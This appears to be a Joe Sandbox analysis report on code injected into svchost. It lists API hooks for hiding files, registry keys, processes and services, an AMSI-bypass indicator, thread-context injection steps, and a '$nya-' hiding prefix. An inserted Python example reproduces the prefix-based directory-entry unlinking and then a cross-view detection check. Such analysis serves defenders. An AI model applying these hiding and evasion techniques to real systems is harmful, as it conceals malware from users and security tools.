22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8126->8127 8128 22f4b92c250 8127->8128 8129 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8128->8129 8130 22f4b92c264 8129->8130 8366 22f4b931398 8367 22f4b9313ae 8366->8367 8368 22f4b9313f5 8367->8368 8370 22f4b93140e 8367->8370 8369 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8368->8369 8371 22f4b9313fa 8369->8371 8372 22f4b931405 8370->8372 8374 22f4b92dd78 14 API calls 8370->8374 8375 22f4b92d04c 8371->8375 8374->8372 8378 22f4b92cef8 8375->8378 8379 22f4b92cf23 8378->8379 8386 22f4b92cf94 8379->8386 8381 22f4b92cf4a 8382 22f4b92cf6d 8381->8382 8396 22f4b92c3e0 8381->8396 8384 22f4b92cf82 8382->8384 8385 22f4b92c3e0 _invalid_parameter_noinfo 17 API calls 8382->8385 8384->8372 8385->8384 8409 22f4b92ccc8 8386->8409 8391 22f4b92cfcf 8391->8381 8397 22f4b92c3ef GetLastError 8396->8397 8398 22f4b92c438 8396->8398 8399 22f4b92c404 8397->8399 8398->8382 8400 22f4b92cba0 _invalid_parameter_noinfo 14 API calls 8399->8400 8401 22f4b92c41e SetLastError 8400->8401 8401->8398 8402 22f4b92c441 8401->8402 8403 22f4b92c3e0 _invalid_parameter_noinfo 15 API calls 8402->8403 8404 22f4b92c467 8403->8404 8435 22f4b92ffe8 8404->8435 8410 22f4b92cd1f 8409->8410 8411 22f4b92cce4 GetLastError 8409->8411 8410->8391 8415 22f4b92cd34 8410->8415 8412 22f4b92ccf4 8411->8412 8422 22f4b92cba0 8412->8422 8416 22f4b92cd50 GetLastError SetLastError 8415->8416 8417 22f4b92cd68 8415->8417 8416->8417 8417->8391 8418 22f4b92d06c IsProcessorFeaturePresent 8417->8418 8419 22f4b92d07f 8418->8419 8427 22f4b92cd80 8419->8427 8423 22f4b92cbc8 FlsGetValue 8422->8423 8425 22f4b92cbc4 8422->8425 8423->8425 8424 22f4b92cbde SetLastError 8424->8410 8425->8424 8426 22f4b92c940 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8425->8426 8426->8424 8428 22f4b92cdba _invalid_parameter_noinfo 8427->8428 8429 22f4b92cde2 RtlCaptureContext RtlLookupFunctionEntry 8428->8429 
                                                  Control-flow graph (text dump of the rendered graph; the node/edge list is not reproduced). Call sequences recoverable from the node labels, by function start address:
                                                  • 22f4b921e3c: LoadLibraryA, GetProcAddress, then a SleepEx loop at 22f4b921e62 before continuing at 22f4b921e6f
                                                  • 22f4b921bc4: loop over 22f4b921724 (GetProcessHeap/HeapAlloc, repeated RegOpenKeyExW calls at nine call sites, RegQueryInfoKeyW and RegEnumValueW enumeration via 22f4b9212b8 and 22f4b92104c, lstrlenW/StrCpyW copies, RegCloseKey), SleepEx, then StrCmpIW/StrCmpW comparisons (22f4b92159c, 22f4b921530) and HeapFree clean-up (22f4b9214a0)
                                                  • 22f4b922518: GetProcessIdOfThread, GetCurrentProcessId, CreateFileW, WriteFile, ReadFile, CloseHandle
                                                  • 22f4b922ab4: three TlsGetValue calls, StrCmpNIW (22f4b923f88), three TlsSetValue calls (22f4b922c32)
                                                  • 22f4b9234b8: PdhGetCounterInfoW twice (GetProcessHeap/HeapAlloc between the calls), StrCmpW, GetProcessHeap/HeapFree, and a subcall at 22f4b923950 with 12 API calls
                                                  • 22f4b925fcc: VirtualProtect (22f4b926000) with a GetLastError branch (22f4b926029)
                                                  • 22f4b926430: SetThreadContext (22f4b9264a6), VirtualProtect and FlushInstructionCache (22f4b926581), VirtualFree (22f4b924b20), ResumeThread (22f4b926677)
                                                  • CRT start-up and error handling: __scrt_acquire_startup_lock, GetCommandLineA/GetCommandLineW, GetEnvironmentStringsW/WideCharToMultiByte/FreeEnvironmentStringsW, GetModuleFileNameW, EnterCriticalSection, RaiseException with __CxxCallCatchBlock/_CreateFrameInfo, and IsDebuggerPresent/SetUnhandledExceptionFilter/UnhandledExceptionFilter/RtlVirtualUnwind ending in GetCurrentProcess/TerminateProcess (22f4b92ce64 to 22f4b92ced5)

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 56b6ef7aae2003b2666995d73d3f8da4165ef61dab3b018a8c9eb3aa42e26a65
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 9351A568D14A56B5FB88FFE5EE787D73730A708345F845932960902563DEFC82AAC390

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: b847adb62990c8b4585e741d70a7157698aa1bc9e67df0a6988a8ea5b1f4b2bb
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: BB41AF36A14B80DAE7A4DFA1E55839A77B1F388B88F008135DB8907759DF7CC595CB00

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 2707e0eff7b1b9e8f61abd333ff2ec4983dee57ae7fd51a1eb0f6ce0dd1bda2b
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 50D06228E11A40F5F9CD7FD1DEBD35622716B5CB01FC45835C70E01262DEAD8569C341

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 0000022F4B923A35
                                                  • PathFindFileNameW.SHLWAPI ref: 0000022F4B923A44
                                                    • Part of subcall function 0000022F4B923F88: StrCmpNIW.KERNELBASE(?,?,?,0000022F4B92272F), ref: 0000022F4B923FA0
                                                    • Part of subcall function 0000022F4B923EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923EDB
                                                    • Part of subcall function 0000022F4B923EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F0E
                                                    • Part of subcall function 0000022F4B923EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F2E
                                                    • Part of subcall function 0000022F4B923EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F47
                                                    • Part of subcall function 0000022F4B923EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F68
                                                  • CreateThread.KERNELBASE ref: 0000022F4B923A8B
                                                    • Part of subcall function 0000022F4B921E74: GetCurrentThread.KERNEL32 ref: 0000022F4B921E7F
                                                    • Part of subcall function 0000022F4B921E74: CreateThread.KERNELBASE ref: 0000022F4B922043
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922049
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922055
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922061
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B92206D
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922079
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922085
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: 5f1f564115a3c2f07b4922df6e2128082fd153148bbbb057b57b51238e2adea1
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 14118B29E28701BAFBE8BFE0EB2C39B23B0A758345F404835860681182DEFCC458C202

                                                  Control-flow Graph

                                                  Control-flow graph of 22f4b923f88 (text dump; the executed/not-executed colouring is lost): entry block 22f4b923f88-22f4b923f93, a StrCmpNIW call in 22f4b923f95-22f4b923fa8 with a side exit through 22f4b923faa, and the return block 22f4b923fad-22f4b923fb4 that all paths reach.
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $nya-
                                                  • API String ID: 0-1266920357
                                                  • Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                  • Instruction ID: 7c511189d8bd023de34a560d2ec103ce2a25d726894c4c52d98c75f0c23c25be
                                                  • Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                  • Instruction Fuzzy Hash: BBD05E29F21706ABFBA8AFE1EEE86A26370DB08B04F485032DA0001101DB988D9EC710
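The string "$nya-" sits beside a StrCmpNIW prefix check (22f4b923f88) that several of the dumped routines call. A case-insensitive, fixed-length prefix compare next to hooks on NtQueryDirectoryFile, NtEnumerateKey and the process and service enumeration APIs is the shape of prefix-based hiding: whatever name starts with the prefix is dropped from the result before the caller sees it. The Python below is an added example, not code from the report or from the sample. It builds a FILE_DIRECTORY_INFORMATION chain of the kind NtQueryDirectoryFile returns, applies the unlinking such a hook performs on the caller's buffer (rewriting NextEntryOffset, or sliding the buffer when the first entry is hidden), and then runs the cross-view check a defender uses: names from an enumeration the hook does not cover that are missing from the API's view. The file names are constructed test data; the structure layout is the documented one.

```python
import struct

PREFIX = "$nya-"   # the string found next to the StrCmpNIW check in the dump

# FILE_DIRECTORY_INFORMATION: NextEntryOffset, FileIndex, CreationTime, LastAccessTime,
# LastWriteTime, ChangeTime, EndOfFile, AllocationSize, FileAttributes, FileNameLength,
# then FileName (UTF-16, not NUL-terminated). The fixed header is 64 bytes.
HDR = struct.Struct("<II6qII")


def build_file_directory_information(names):
    """Constructed test data: serialise names into the chain NtQueryDirectoryFile
    fills in (entries 8-byte aligned, NextEntryOffset == 0 on the last one)."""
    blobs = []
    for idx, name in enumerate(names):
        fname = name.encode("utf-16-le")
        size = HDR.size + len(fname)
        padded = (size + 7) & ~7
        nxt = 0 if idx == len(names) - 1 else padded
        blobs.append(HDR.pack(nxt, idx, 0, 0, 0, 0, 0, 0, 0x80, len(fname))
                     + fname + b"\0" * (padded - size))
    return b"".join(blobs)


def walk(buf):
    """Yield (offset, next_entry_offset, name) following the NextEntryOffset chain."""
    off = 0
    while True:
        nxt, _idx, *_times, _attr, nlen = HDR.unpack_from(buf, off)
        name = bytes(buf[off + HDR.size: off + HDR.size + nlen]).decode("utf-16-le")
        yield off, nxt, name
        if nxt == 0:
            return
        off += nxt


def hides(name, prefix=PREFIX):
    """StrCmpNIW(name, prefix, len(prefix)) == 0: case-insensitive prefix match."""
    return name[: len(prefix)].casefold() == prefix.casefold()


def apply_hook_filter(buf, prefix=PREFIX):
    """What a hook on NtQueryDirectoryFile does to the caller's buffer once the
    real call has returned: unlink every entry whose name carries the prefix.
    Middle and trailing entries are skipped by rewriting the predecessor's
    NextEntryOffset; a hidden first entry is removed by sliding the rest down."""
    buf = bytearray(buf)
    off, prev = 0, None
    while True:
        nxt = struct.unpack_from("<I", buf, off)[0]
        nlen = struct.unpack_from("<I", buf, off + 60)[0]
        name = bytes(buf[off + 64: off + 64 + nlen]).decode("utf-16-le")
        if not hides(name, prefix):
            prev = off
        elif prev is None:                  # hidden entry is the first one
            if nxt == 0:
                return b""                  # nothing left; a hook reports no more files
            del buf[off: off + nxt]         # slide the remainder over it
            continue                        # re-examine the entry now at `off`
        else:                               # predecessor skips this entry
            prev_nxt = struct.unpack_from("<I", buf, prev)[0]
            struct.pack_into("<I", buf, prev, 0 if nxt == 0 else prev_nxt + nxt)
        if nxt == 0:
            return bytes(buf)
        off += nxt


def names_in(buf):
    return [name for _, _, name in walk(buf)] if buf else []


def cross_view_diff(api_view, independent_view):
    """Defender's check: names an enumeration the hook does not cover (raw volume
    parsing, a kernel-side listing) reports but the hooked API's result omits."""
    return sorted(set(independent_view) - set(api_view))


# Constructed listing with hidden entries at the front, in the middle (different
# case) and at the end, so that all three unlink paths are exercised.
LISTING = ["$nya-svchost.exe", "Documents", "$NYA-config.dat", "notes.txt", "$nya-tail"]

if __name__ == "__main__":
    raw = build_file_directory_information(LISTING)
    seen = names_in(apply_hook_filter(raw))
    print("API view:", seen)
    print("hidden  :", cross_view_diff(seen, LISTING))
```

The same unlink logic, applied to SYSTEM_PROCESS_INFORMATION for NtQuerySystemInformation or to the key and value index for NtEnumerateKey/NtEnumerateValueKey, is what makes the hidden objects vanish from Explorer, Task Manager and regedit while a cross-view comparison against an unhooked source still sees them.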
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000003.1646195511.0000022F4B8F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_3_22f4b8f0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 1a342e552356d2e1af5ce3fa28535de16e2ccce78197f29e3b350a65e4913c9f
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: A191477AF0125097EBA0AF65D608F7EB3A1F744B96F548131AF490778AEA38D853C710

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0000022F4B921724: GetProcessHeap.KERNEL32 ref: 0000022F4B92172F
                                                    • Part of subcall function 0000022F4B921724: HeapAlloc.KERNEL32 ref: 0000022F4B92173E
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217AE
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217DB
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9217F5
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921815
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921830
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921850
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92186B
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92188B
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9218A6
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9218C6
                                                  • SleepEx.KERNELBASE ref: 0000022F4B921BDF
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9218E1
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921901
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92191C
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92193C
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921957
                                                    • Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921977
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921992
                                                    • Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92199C
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: 3929e908c5efdb50802740529e7f9fb41309619d651063b853838cf7facbc3eb
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: E1319C5DE00665A1FB98BFE7D76936B23B4A744BC0F0458319F0987797DE98C4B0C214

                                                   Control-flow Graph
                                                   • Rendered graph not reproduced; recoverable data from the node list: function 22f4b922ff0 (basic blocks 22f4b922ff0-22f4b9233a7), executed/not-executed colouring lost
                                                   • API calls on the graph: GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW (two call sites)
                                                   • Internal calls: 22f4b921a30, 22f4b921cc4, 22f4b921cfc, 22f4b923f88, 22f4b933a40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 147cdcf82202d8e0471ff3581cefa6d14657757d9480307097532bc8ead48c1b
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: E0B1D429E14690AAFB9CAFA5D62835B63B4F744B84F405436DF0953796DFB8CD40C341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 5eede67ed12d608bc06b41e83df98e201cc61c4a372c92de6e6655074c48d11c
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 1D318176A04B8096EBA4AFA0E8A43DE7370F788744F44443ADB4D47B99EFB8C548C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: b9e4fb152665ba47da9891cea323b39acc5666c2d8f9b080be451602521d2c89
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 8F41BB3AA04B80A6EBA0DF64E89439F73B0F788754F500535EB8D46B9ADFB8C555CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: c7a4973126e1821149b9bb57efd12384a65569e6dc40a33e3ade57d1bdd71235
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 73A1F72AF0468069FBA4EFB5D6683AF6BB0AB45794F184535DF4427BD6CABCC041E700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                   • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                   • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
